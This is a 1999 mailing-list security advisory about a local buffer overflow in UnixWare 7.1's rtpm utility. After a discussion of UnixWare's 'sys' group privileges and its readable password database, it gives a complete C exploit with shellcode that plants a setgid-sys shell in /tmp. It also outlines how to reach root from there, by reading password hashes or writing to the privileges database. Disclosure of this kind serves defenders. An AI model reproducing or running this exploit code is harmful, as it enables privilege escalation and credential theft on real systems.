Date: Thu, 30 Dec 1999 11:03:07 CST
From: Brock Tellier <[email protected]>
To: [email protected]Subject: UnixWare rtpm exploit + discussion
Greetings,
OVERVIEW
Any local users can exploit a bug in rtpm to gain "sys" privileges.
A root compromise is then trivial.
BACKGROUND
As usual, I've only tested UnixWare 7.1, all others should be
assumed vulnerable.
UnixWare has a slightly different system of managing the password
database than Linux/BSD/Solaris and the like. In addition to the
conventional /etc/passwd and /etc/shadow, UnixWare keeps a copy of
these files (including encrypted passwords) in
/etc/security/ia/master and /etc/security/ia/omaster. These are
binary files containing the same information as /etc/passwd and
/etc/shadow in a different format. Various UW C functions can be
used to access this information. Some programs use this file for
authentication purposes, instead of /etc/shadow, such as the
i2odialog daemon.
The only major security problem I've found with this is that group
"sys" is able to read from this database. If there were no programs
setgid sys, this would not be a problem, however UnixWare's
owner/group scheme relies very heavily on this group. /dev/*mem* is
readable by sys (instead of having a seperate kmem group) and many
key directories, such as /sbin, and critical binaries are writable
by this group. The /etc/security/tcb/privs database (which controls
which non-suid/sgid programs gain additional privileges) is also
writable by sys. As a consequence, many programs which need to
access /dev/kmem and various other config files are sgid sys instead
of sgid/suid to a more specialized group. Once we have exploited one
of these programs to gain the gid of sys, we have nearly full control
over the system.
I suppose that the argument can be made that the gain of any extra
privileges will allow someone to gain root, given enough time, but UW
seems to have given privileges so close to root that they might as
well BE root. The encrypted passwords for the system should NEVER be
readable by anyone other than root (and *maybe* the "shadow" group,
whose sole purpose is authentication).
All this makes me think more about the slightly skewed but good
intentioned UnixWare scheme of privileges. I think it's a great idea
to have a program like ping only gain "driver" privileges (where it
can only access devices with elevated privileges). Although there
were/are some growing pains migrating to this system, it will probably
end up replacing 75% of the s-bits on a UnixWare system. Naturally
some programs will need full root privileges to operate correctly,
but for those specialized programs that only really need to accomplish
one task, it's perfect.
All that being said, I wonder if any of the open source OS's like
linux and bsd are considering migrating to this type of system, or
at least making it an option or patch.
DETAILS
A simple buffer overflow in /usr/sbin/rtpm will allow us to gain
sys privileges. From there, you can strings(1) the
/etc/security/ia/master file for the encrypted root password or
inject a shell into the /etc/security/tcb/privs file. Either of
these will lead to a fairly quick root compromise.
EXPLOIT
A small warning about this exploit. rtpm is one of those ascii gui
programs that messes with your term. If it doesn't exit normally,
it will leave you with a mostly unusable session. For this reason,
this exploit will drop /tmp/ksh as sgid-sys and exit. After you
run the exploit, you'll probably need to forcefully logout (exit
might not work) then log back in to get your privs. The default
offset should work, but if it doesn't you should write a script to
change it rather than deal with logging out/in every time you want
to change your offset.
/**
** uwrtpm.c - UnixWare 7.1 rtpm exploit
**
**
** Drops a setgid sys shell in /tmp/ksh. We can't exec a shell because
** rtpm screws up our terminal when it exits abnormally. After running
** this exploit, you must forcefully exit your shell and re-login to exec
** your sys shell.
**
** cc -o uwrtpm uwrtpm.c; ./rtpm <offset>
** use offsets of +-100
**
** Brock Tellier [email protected]
**
**/
#include <stdlib.h>
#include <stdio.h>
char scoshell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/rt\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define ALIGN 3
#define LEN 1100
#define NOP 0x90
#define SYSSHELL "void main() {setregid(3,3);system(\"cp /bin/ksh \
/tmp/ksh; chgrp sys /tmp/ksh; chmod 2555 /tmp/ksh\"); } "
void buildrt() {
FILE *fp;
char cc[100];
fp = fopen("/tmp/rt.c", "w");
fprintf(fp, SYSSHELL);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/rt /tmp/rt.c");
system(cc);
}
int main(int argc, char *argv[]) {
long int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];
if(argc > 3) {
fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
exit(0);
}
else if (argc == 2){
offset=atoi(argv[1]);
}
else if (argc == 3) {
offset=atoi(argv[1]);
buflen=atoi(argv[2]);
}
else {
offset=0;
buflen=1100;
}
buildrt();
addr=0x8046a01 + offset;
fprintf(stderr, "\nUnixWare 7.1 rtpm exploit drops a setgid sys shell ");
fprintf(stderr, "in /tmp/ksh\n");
fprintf(stderr, "Brock Tellier [email protected]\n\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);
memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
for(i=((buflen/2) + strlen(scoshell))+ALIGN;i<buflen-4;i+=4)
*(int *)&buf[i]=addr;
memcpy(buf, "HOME=", 5);
buf[buflen - 1] = 0;
putenv(buf);
execl("/usr/sbin/rtpm", "rtpm", NULL);
exit(0);
}
Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
[email protected]
____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
